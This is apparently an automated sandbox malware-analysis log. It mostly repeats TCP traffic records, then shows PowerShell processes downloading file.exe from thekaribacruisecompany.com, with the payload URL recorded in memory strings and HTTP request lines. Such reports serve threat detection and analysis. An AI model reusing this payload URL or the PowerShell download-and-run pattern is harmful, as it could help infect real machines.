Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global traffic TCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic HTTP traffic detected: GET /file.exe HTTP/1.1 Host: thekaribacruisecompany.com Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: global traffic HTTP traffic detected: GET /file.exe HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: thekaribacruisecompany.com Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.c
Source: powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.com/file.exe
Source: powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.com/file.exePE
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.com/file.exePEQ
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B3A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: file.exe, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
